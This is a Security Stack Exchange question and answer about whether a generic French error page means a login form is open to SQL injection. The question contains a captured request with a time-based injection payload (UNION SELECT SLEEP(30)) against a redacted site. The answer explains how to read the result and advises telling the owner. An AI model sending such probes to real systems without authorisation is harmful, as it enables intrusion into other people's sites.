0

I think I found an SQL vulnerability; the request and response can be found below. I'm not sure because it is showing a normal error (it's in French) instead of showing an SQL error.

I also tried to SQL inject the user page (after I logged in normally to the site) by adding a quote (') to a parameter, but I got the same normal error instead of the SQL one.

Could someone experienced tell me if this is an SQL error message and if an exploit is possible? If yes, how can someone exploit this?

GET /Anonym/Login.aspx?lnrid=636705509463187707" UNION SELECT SLEEP(30) -- &_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&__EGClientState=NY&__VIEWSTATE=NY&__EVENTVALIDATION=%2FwEdAAivVXD1oYELeveMr0vHCmYPbKvSQfBZG4FRSb%2F8I7pm6gbzWSkUOVnL89VotOv3iwS9OtS9D9WQklHFFt9eID42Uj1o80q1QHHhR9Njbuhhm5HMJLG0qgnnIQHDWK64dEQaUDEQ2ba3nFNQp5gIEycdbMy1%2F4YQMXKqdpE3Qw%2F6%2Fw%3D%3D&egWindowManager%24clientWindow%24Oui=Oui&egWindowManager%24clientWindow%24Non=Non&egWindowManager%24clientWindow%24Ok=Ok&ctlUserCode=vega&ctlUserPassword=vega&ctlLogon=Connexion
Host: redacted
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Date: Fri, 24 Aug 2018 07:37:32 GMT
Content-Length: 2082

[error page; only relevant parts:]
<body>
<form name="FrmErr" method="post" action="../PageErreur.aspx?lnrid=636705509463187707%22+UNION+SELECT+SLEEP(30)+--+&amp;_lnPageGuid=0709206f-a5aa-40cf-bad7-78fb5452f5df&amp;__EGClientState=NY&amp;egWindowManager%24clientWindow%24Oui=Oui&amp;egWindowManager%24clientWindow%24Non=Non&amp;egWindowManager%24clientWindow%24Ok=Ok&amp;ctlUserCode=vega&amp;ctlUserPassword=vega&amp;ctlLogon=Connexion" id="FrmErr">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTk3MzY5NzU2NmRk" />
</div>   
  <div class="Outer">
     <div class="Middle">
        <div class="Inner">
           <div class="ErrMsg">
              <table style="margin: auto;">
                 <tr>
                    <td><img id="ImgLogo" src="../Logo.gif" style="border-width:0px;" /></td>
                    <td>&nbsp;</td>
                    <td><br />Le site éprouve présentement des difficultés, nous sommes désolés du contretemps.</td>
                 </tr>
              </table>                  
              <hr width="60%" noShade="noShade" SIZE="0" />
           </div>
        </div>
     </div>
  </div>
</form>
schroeder
  • 123,438
  • 55
  • 284
  • 319
Adel M.
  • 1
  • 2
  • 5
    Welcome Adel. I am taking the freedom to replace your link with a request-response pair with redacted server infos out of respect for the site. It's not a good idea to link such a site from here; that will produce lots of traffic and maybe attacks. Please opt for any possible methods of redaction of data that is not important when you post questions here. – Tobi Nary Aug 24 '18 at 07:35
  • 2
    Personally, I don't find questions like "Could someone experienced tell me if this is an SQL error message and if an exploit is possible? If yes, how can someone exploit this?" ethical at all. It boils down to "can someone hack this site for me?" and smells even if the pretext is a "pen-testing". – Your Common Sense Aug 24 '18 at 08:10
  • @YourCommonSense I'm not sure that I'm seeing an ethical problem. Any junior tester will take unusual resposes to more senior testers for interpretation all the time. If the true intent is "hack this site for me" that's different. – schroeder Aug 24 '18 at 08:14
  • This is now a part of the site. We can't just "delete it" since there will be a history trail that will persist, Is there a reason why you want it deleted? – schroeder Nov 14 '20 at 08:22

1 Answers1

3

Your error message is not really conclusive. It just states (if my french isn't as bad as I think it is) that the site encountered some kind of error. This may mean literally everything from "SQL returned an error" to "The backend's gone because a plane crashed into it".

Also you were trying to inject this:

" UNION SELECT SLEEP(30) --

What behaviour would you expect from a vulnerable site? In case your statement is sytactically correct, most likely you would expect an errorless return of the server after 30 seconds. So: Did you measure the time?

Also: How did you conclude this is the correct syntax for whatever used backend? There are multiple different SQL-based languages and interpreters and choosing the wrong syntax will most likely produce errors independent of applied filtering.

So you questions might be answered with:

Could someone experienced tell me if this is an SQL error message and if an exploit is possible?

No it's most likely impossible on basis of the information provided.

If yes, how can someone exploit this?

It most likely doesn't matter. If you manage to prove that SQL-Injection is possible (bei either producing an actual SQL error or conclude from timing or error-basis), there will probably be no reason to exploit.

Just tell the owner ;)

Ben
  • 2,024
  • 8
  • 17